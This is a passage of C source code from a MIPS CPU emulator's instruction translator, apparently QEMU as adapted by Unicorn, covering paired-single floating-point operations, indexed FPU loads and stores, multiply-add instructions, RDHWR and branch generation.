gen_helper_float_recip2_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_RECIP1_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_recip1_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_RSQRT1_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_rsqrt1_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_RSQRT2_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_rsqrt2_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_CVT_S_PU: check_cp1_64bitmode(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32h(ctx, fp0, fs); gen_helper_float_cvts_pu(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_CVT_PW_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_cvtpw_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_CVT_S_PL: check_cp1_64bitmode(ctx); { TCGv_i32 
fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_cvts_pl(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_PLL_PS: check_ps(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_store_fpr32h(ctx, fp0, fd); gen_store_fpr32(ctx, fp1, fd); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); } break; case OPC_PLU_PS: check_ps(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32h(ctx, fp1, ft); gen_store_fpr32(ctx, fp1, fd); gen_store_fpr32h(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); } break; case OPC_PUL_PS: check_ps(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32h(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_store_fpr32(ctx, fp1, fd); gen_store_fpr32h(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); } break; case OPC_PUU_PS: check_ps(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32h(ctx, fp0, fs); gen_load_fpr32h(ctx, fp1, ft); gen_store_fpr32(ctx, fp1, fd); gen_store_fpr32h(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); } break; case OPC_CMP_F_PS: case OPC_CMP_UN_PS: case OPC_CMP_EQ_PS: case OPC_CMP_UEQ_PS: case OPC_CMP_OLT_PS: case OPC_CMP_ULT_PS: case OPC_CMP_OLE_PS: case OPC_CMP_ULE_PS: case OPC_CMP_SF_PS: case OPC_CMP_NGLE_PS: case OPC_CMP_SEQ_PS: case OPC_CMP_NGL_PS: case OPC_CMP_LT_PS: case OPC_CMP_NGE_PS: case OPC_CMP_LE_PS: case OPC_CMP_NGT_PS: if (ctx->opcode & (1 << 6)) { gen_cmpabs_ps(ctx, func - 48, ft, fs, cc); } else { gen_cmp_ps(ctx, func - 48, ft, fs, cc); } break; default: MIPS_INVAL("farith"); generate_exception_end(ctx, EXCP_RI); return; } } /* Coprocessor 3 (FPU) */ static void gen_flt3_ldst(DisasContext *ctx, uint32_t opc, int fd, int fs, int base, int index) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); if (base == 0) { gen_load_gpr(tcg_ctx, t0, index); } else if (index == 0) { gen_load_gpr(tcg_ctx, t0, base); } else { gen_op_addr_add(ctx, t0, tcg_ctx->cpu_gpr[base], tcg_ctx->cpu_gpr[index]); } /* * Don't do NOP if destination is zero: we must perform the actual * memory access. 
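 * Even when the destination register makes the result architecturally
 * uninteresting, the access can still fault (address error or TLB
 * exception), so it has to be emitted.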
*/ switch (opc) { case OPC_LWXC1: check_cop1x(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TESL); tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_LDXC1: check_cop1x(ctx); check_cp1_registers(ctx, fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEQ); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_LUXC1: check_cp1_64bitmode(ctx); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x7); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEQ); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_SWXC1: check_cop1x(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); tcg_gen_qemu_st_i32(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEUL); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_SDXC1: check_cop1x(ctx); check_cp1_registers(ctx, fs); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); tcg_gen_qemu_st_i64(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEQ); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_SUXC1: check_cp1_64bitmode(ctx); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x7); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); tcg_gen_qemu_st_i64(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEQ); tcg_temp_free_i64(tcg_ctx, fp0); } break; } tcg_temp_free(tcg_ctx, t0); } static void gen_flt3_arith(DisasContext *ctx, uint32_t opc, int fd, int fr, int fs, int ft) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; switch (opc) { case OPC_ALNV_PS: check_ps(ctx); { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv_i32 fp = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fph = tcg_temp_new_i32(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t0, fr); tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x7); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, 0, l1); gen_load_fpr32(ctx, fp, fs); gen_load_fpr32h(ctx, fph, fs); gen_store_fpr32(ctx, fp, fd); gen_store_fpr32h(ctx, fph, fd); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, 4, l2); tcg_temp_free(tcg_ctx, t0); #ifdef TARGET_WORDS_BIGENDIAN gen_load_fpr32(ctx, fp, fs); gen_load_fpr32h(ctx, fph, ft); gen_store_fpr32h(ctx, fp, fd); gen_store_fpr32(ctx, fph, fd); #else gen_load_fpr32h(ctx, fph, fs); gen_load_fpr32(ctx, fp, ft); gen_store_fpr32(ctx, fph, fd); gen_store_fpr32h(ctx, fp, fd); #endif gen_set_label(tcg_ctx, l2); tcg_temp_free_i32(tcg_ctx, fp); tcg_temp_free_i32(tcg_ctx, fph); } break; case OPC_MADD_S: check_cop1x(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fr); gen_helper_float_madd_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); } break; case OPC_MADD_D: check_cop1x(ctx); check_cp1_registers(ctx, fd | fs | ft | fr); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_madd_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); 
tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_MADD_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_madd_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_MSUB_S: check_cop1x(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fr); gen_helper_float_msub_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); } break; case OPC_MSUB_D: check_cop1x(ctx); check_cp1_registers(ctx, fd | fs | ft | fr); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_msub_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_MSUB_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_msub_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_NMADD_S: check_cop1x(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fr); gen_helper_float_nmadd_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); } break; case OPC_NMADD_D: check_cop1x(ctx); check_cp1_registers(ctx, fd | fs | ft | fr); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_nmadd_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_NMADD_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_nmadd_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_NMSUB_S: check_cop1x(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = 
tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fr); gen_helper_float_nmsub_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); } break; case OPC_NMSUB_D: check_cop1x(ctx); check_cp1_registers(ctx, fd | fs | ft | fr); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_nmsub_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_NMSUB_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_nmsub_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; default: MIPS_INVAL("flt3_arith"); generate_exception_end(ctx, EXCP_RI); return; } } static void gen_rdhwr(DisasContext *ctx, int rt, int rd, int sel) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; /* * The Linux kernel will emulate rdhwr if it's not supported natively. * Therefore only check the ISA in system mode. */ check_insn(ctx, ISA_MIPS32R2); t0 = tcg_temp_new(tcg_ctx); switch (rd) { case 0: gen_helper_rdhwr_cpunum(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case 1: gen_helper_rdhwr_synci_step(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case 2: if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_rdhwr_cc(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); /* * Break the TB to be able to take timer interrupts immediately * after reading count. DISAS_STOP isn't sufficient, we need to ensure * we break completely out of translated code. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; break; case 3: gen_helper_rdhwr_ccres(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case 4: check_insn(ctx, ISA_MIPS32R6); if (sel != 0) { /* * Performance counter registers are not implemented other than * control register 0. 
*/ generate_exception(ctx, EXCP_RI); } gen_helper_rdhwr_performance(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case 5: check_insn(ctx, ISA_MIPS32R6); gen_helper_rdhwr_xnp(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case 29: if ((ctx->hflags & MIPS_HFLAG_CP0) || (ctx->hflags & MIPS_HFLAG_HWRENA_ULR)) { tcg_gen_ld_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); gen_store_gpr(tcg_ctx, t0, rt); } else { generate_exception_end(ctx, EXCP_RI); } break; default: /* Invalid */ MIPS_INVAL("rdhwr"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, t0); } static inline void clear_branch_hflags(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; ctx->hflags &= ~MIPS_HFLAG_BMASK; if (ctx->base.is_jmp == DISAS_NEXT) { save_cpu_state(ctx, 0); } else { /* * It is not safe to save ctx->hflags as hflags may be changed * at execution time by the instruction in the delay / forbidden slot. */ tcg_gen_andi_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, ~MIPS_HFLAG_BMASK); } } static void gen_branch(DisasContext *ctx, int insn_bytes) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->hflags & MIPS_HFLAG_BMASK) { int proc_hflags = ctx->hflags & MIPS_HFLAG_BMASK; /* Branch completion */ clear_branch_hflags(ctx); ctx->base.is_jmp = DISAS_NORETURN; /* FIXME: Need to clear can_do_io. */ switch (proc_hflags & MIPS_HFLAG_BMASK_BASE) { case MIPS_HFLAG_FBNSLOT: gen_goto_tb(ctx, 0, ctx->base.pc_next + insn_bytes); break; case MIPS_HFLAG_B: /* unconditional branch */ if (proc_hflags & MIPS_HFLAG_BX) { tcg_gen_xori_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, MIPS_HFLAG_M16); } gen_goto_tb(ctx, 0, ctx->btarget); break; case MIPS_HFLAG_BL: /* branch-likely taken case */ gen_goto_tb(ctx, 0, ctx->btarget); break; case MIPS_HFLAG_BC: /* Conditional branch */ { TCGLabel *l1 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->bcond, 0, l1); gen_goto_tb(ctx, 1, ctx->base.pc_next + insn_bytes); gen_set_label(tcg_ctx, l1); gen_goto_tb(ctx, 0, ctx->btarget); } break; case MIPS_HFLAG_BR: /* unconditional branch to register */ if (ctx->insn_flags & (ASE_MIPS16 | ASE_MICROMIPS)) { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, tcg_ctx->btarget, 0x1); tcg_gen_trunc_tl_i32(tcg_ctx, t1, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_andi_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, ~(uint32_t)MIPS_HFLAG_M16); tcg_gen_shli_i32(tcg_ctx, t1, t1, MIPS_HFLAG_M16_SHIFT); tcg_gen_or_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, t1); tcg_temp_free_i32(tcg_ctx, t1); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->btarget, ~(target_ulong)0x1); } else { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->btarget); } if (ctx->base.singlestep_enabled) { save_cpu_state(ctx, 0); gen_helper_raise_exception_debug(tcg_ctx, tcg_ctx->cpu_env); } tcg_gen_lookup_and_goto_ptr(tcg_ctx); break; default: fprintf(stderr, "unknown branch 0x%x\n", proc_hflags); abort(); } } } /* Compact Branches */ static void gen_compute_compact_branch(DisasContext *ctx, uint32_t opc, int rs, int rt, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int bcond_compute = 0; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); int m16_lowbit = (ctx->hflags & MIPS_HFLAG_M16) != 0; if (ctx->hflags & MIPS_HFLAG_BMASK) { #ifdef MIPS_DEBUG_DISAS LOG_DISAS("Branch in delay / forbidden slot at PC 0x" TARGET_FMT_lx "\n", ctx->base.pc_next); #endif generate_exception_end(ctx, EXCP_RI);
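/* * A compact branch appearing in a delay or forbidden slot is reserved, * so the code above raises a Reserved Instruction exception and the * goto below abandons decoding of this instruction. */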
goto out; } /* Load needed operands and calculate btarget */ switch (opc) { /* compact branch */ case OPC_BOVC: /* OPC_BEQZALC, OPC_BEQC */ case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC */ gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); bcond_compute = 1; ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); if (rs <= rt && rs == 0) { /* OPC_BEQZALC, OPC_BNEZALC */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + 4 + m16_lowbit); } break; case OPC_BLEZC: /* OPC_BGEZC, OPC_BGEC */ case OPC_BGTZC: /* OPC_BLTZC, OPC_BLTC */ gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); bcond_compute = 1; ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); break; case OPC_BLEZALC: /* OPC_BGEZALC, OPC_BGEUC */ case OPC_BGTZALC: /* OPC_BLTZALC, OPC_BLTUC */ if (rs == 0 || rs == rt) { /* OPC_BLEZALC, OPC_BGEZALC */ /* OPC_BGTZALC, OPC_BLTZALC */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + 4 + m16_lowbit); } gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); bcond_compute = 1; ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); break; case OPC_BC: case OPC_BALC: ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); break; case OPC_BEQZC: case OPC_BNEZC: if (rs != 0) { /* OPC_BEQZC, OPC_BNEZC */ gen_load_gpr(tcg_ctx, t0, rs); bcond_compute = 1; ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); } else { /* OPC_JIC, OPC_JIALC */ TCGv tbase = tcg_temp_new(tcg_ctx); TCGv toffset = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, tbase, rt); tcg_gen_movi_tl(tcg_ctx, toffset, offset); gen_op_addr_add(ctx, tcg_ctx->btarget, tbase, toffset); tcg_temp_free(tcg_ctx, tbase); tcg_temp_free(tcg_ctx, toffset); } break; default: MIPS_INVAL("Compact branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } if (bcond_compute == 0) { /* Unconditional compact branch */ switch (opc) { case OPC_JIALC: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + 4 + m16_lowbit); /* Fallthrough */ case OPC_JIC: ctx->hflags |= MIPS_HFLAG_BR; break; case OPC_BALC: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + 4 + m16_lowbit); /* Fallthrough */ case OPC_BC: ctx->hflags |= MIPS_HFLAG_B; break; default: MIPS_INVAL("Compact branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } /* Generating branch here as compact branches don't have a delay slot */ gen_branch(ctx, 4); } else { /* Conditional compact branch */ TCGLabel *fs = gen_new_label(tcg_ctx); save_cpu_state(ctx, 0); switch (opc) { case OPC_BLEZALC: /* OPC_BGEZALC, OPC_BGEUC */ if (rs == 0 && rt != 0) { /* OPC_BLEZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LE), t1, 0, fs); } else if (rs != 0 && rt != 0 && rs == rt) { /* OPC_BGEZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t1, 0, fs); } else { /* OPC_BGEUC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GEU), t0, t1, fs); } break; case OPC_BGTZALC: /* OPC_BLTZALC, OPC_BLTUC */ if (rs == 0 && rt != 0) { /* OPC_BGTZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GT), t1, 0, fs); } else if (rs != 0 && rt != 0 && rs == rt) { /* OPC_BLTZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t1, 0, fs); } else { /* OPC_BLTUC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LTU), t0, t1, fs); } break; case OPC_BLEZC: /* OPC_BGEZC, OPC_BGEC */ if (rs == 0 && rt != 0) { /* OPC_BLEZC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LE), t1, 0, fs); } else if (rs != 0 && rt != 0 && rs == rt) { /* OPC_BGEZC */
tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t1, 0, fs); } else { /* OPC_BGEC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t0, t1, fs); } break; case OPC_BGTZC: /* OPC_BLTZC, OPC_BLTC */ if (rs == 0 && rt != 0) { /* OPC_BGTZC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GT), t1, 0, fs); } else if (rs != 0 && rt != 0 && rs == rt) { /* OPC_BLTZC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t1, 0, fs); } else { /* OPC_BLTC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t0, t1, fs); } break; case OPC_BOVC: /* OPC_BEQZALC, OPC_BEQC */ case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC */ if (rs >= rt) { /* OPC_BOVC, OPC_BNVC */ TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); TCGv t4 = tcg_temp_new(tcg_ctx); TCGv input_overflow = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_ext32s_tl(tcg_ctx, t2, t0); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, input_overflow, t2, t0); tcg_gen_ext32s_tl(tcg_ctx, t3, t1); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, t4, t3, t1); tcg_gen_or_tl(tcg_ctx, input_overflow, input_overflow, t4); 